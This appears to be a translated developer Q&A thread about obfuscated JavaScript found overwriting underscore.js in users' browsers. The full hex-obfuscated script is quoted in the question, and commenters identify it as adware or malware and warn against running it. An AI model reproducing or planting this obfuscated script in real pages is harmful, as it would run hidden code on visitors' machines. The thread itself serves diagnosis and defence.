【发布时间】:2015-07-21 20:38:20
【问题描述】:
我们使用一种工具来跟踪用户浏览器中发生的 js 错误。我们有时会看到underscore 引发类似TypeError: string is not a function 的错误,因为它被看起来像这样的字符串覆盖
var _0x54e9 = ['triml', "\x72", "\x65\x74\x75\x72", "\x6E\x20\x74\x68", "\x69\x73", "\x63\x6F", "\x6E\x73\x74\x72", "\x75\x63\x74\x6F\x72", "\x66\x69", "\x6C\x74\x65", "\x62\x69\x6E\x64", "\x63", "\x68\x61\x72", "\x43", "\x6F", "\x64\x65\x41\x74", "", "\x61\x70\x70\x6C\x79", "\x70", "\x72\x6F\x74\x6F", "\x74", "\x79\x70\x65", "\x46\x75\x6E\x63\x74\x69\x6F\x6E", "\x4D\x61\x74\x68", "\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x63\x6C\x65\x61\x72\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x6A\x6F\x69\x6E", "\x70\x75\x73\x68", "\x70\x61\x72\x73\x65\x49\x6E\x74", "\x66", "\x6D", "\x68", "\x61\x72", "\x64\x65", "\x73\x70\x6C\x69\x74", "\x63\x6F\x6E\x63\x61\x74", "\x31", "\x30", "\x32", "\x72\x61\x6E\x64\x6F\x6D", "\x73\x70\x6C\x69\x63\x65", "\x40", "\x74\x6F\x53\x74\x72\x69\x6E\x67", "\x0A\x0A\x0A", "\x6C\x65\x6E\x67\x74\x68", "\x6E", "\x61\x74"];
[][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[0]] = function(_0x95b5x1, _0x95b5x2) {
try {
with({
console: null,
window: null,
s: [(function _0x95b5x10() {
return (this[_0x54e9[44]] < ((([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]][_0x54e9[39]]() * 44332) + 323456) >> 0)) ? _0x95b5x10[_0x54e9[17]](this[_0x54e9[11] + _0x54e9[14] + _0x54e9[45] + _0x54e9[11] + _0x54e9[46]](this)) : this
}[_0x54e9[17]](_0x54e9[43]))[_0x54e9[42]]()],
c: []
}) {
var _0x95b5x3 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[22]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[10]][_0x54e9[17]]((_0x54e9[16])[_0x54e9[11] + _0x54e9[12] + _0x54e9[13] + _0x54e9[14] + _0x54e9[15]], [_0x95b5x1]),
_0x95b5x4 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]],
_0x95b5x5 = (function(_0x95b5xf) {
_0x95b5xf && _0x95b5xf()
}),
_0x95b5x6 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[24]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x7 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[25]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x8 = 1000000,
_0x95b5x9 = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[10]](c, [_0x54e9[16]]),
_0x95b5xa = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](c),
_0x95b5xb = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](s),
_0x95b5xc = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[28]],
_0x95b5xd = (_0x54e9[16])[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[29] + _0x54e9[1] + _0x54e9[14] + _0x54e9[30] + _0x54e9[13] + _0x54e9[31] + _0x54e9[32] + _0x54e9[13] + _0x54e9[14] + _0x54e9[33]],
_0x95b5xe = _0x95b5x6(function() {
try {
(function() {
try {
[][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x95b5x7(!(this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[17]](this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]], [(function() {
while ((this[5]++, _0x95b5xa(_0x95b5x3(this[5] - 1) ^ this[0] ? ((!((!(_0x95b5x3(this[5] - 1) & this[1])) && (_0x95b5xb(_0x95b5xd(_0x95b5xc(_0x95b5x9(), this[4])), [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x54e9[16])))) ? this[1] : _0x54e9[16]) : this[2]), !!this[7 + this[5]])) {}
}[_0x54e9[10]](this)[_0x54e9[17]]()) || ([][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[17]](s, [_0x54e9[16]])) || _0x54e9[41]])() && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8])) && _0x95b5xe)
} catch (A) {
_0x95b5x7(_0x95b5xe);
if (_0x95b5x2) {
throw A
};
}
}[_0x54e9[10]]([31, _0x54e9[36], _0x54e9[37], _0x54e9[16], _0x54e9[38], 0][_0x54e9[35]](_0x95b5x1[_0x54e9[34]](_0x54e9[16])))())
} catch (A) {
if (_0x95b5x2) {
throw A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()), 1)
}
} catch (A) {
if (_0x95b5x2) {
return A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])());
有谁知道这是从哪里来的以及如何防止这种情况发生?
【问题讨论】:
-
如何将错误链接到下划线?
-
我不建议任何人运行此代码。这是一个恶意软件。
-
在ddecode.com/hexdecoder/…,您会看到数组的解码值。从那里你可以解扰其他部分。它们由数组值组合而成。
-
我认为它是编写不良的客户端恶意软件(浏览器栏等)。除了向访问者推荐Spybot - Search & Destroy 之类的工具外,您无能为力。这不受 underscore.js 的影响,它们仅使用以下划线开头的函数名称。我使用qbaka 来检测客户端 JS 错误,我收到很多与某些广告软件、恶意软件等相关的错误消息。
-
@Reeno: 值得一提的是,有问题的恶意软件使用了
Array#filter,这在 IE8 中不存在。知道用户代理报告此问题是否存在模式会很有趣。
标签: javascript overwrite malware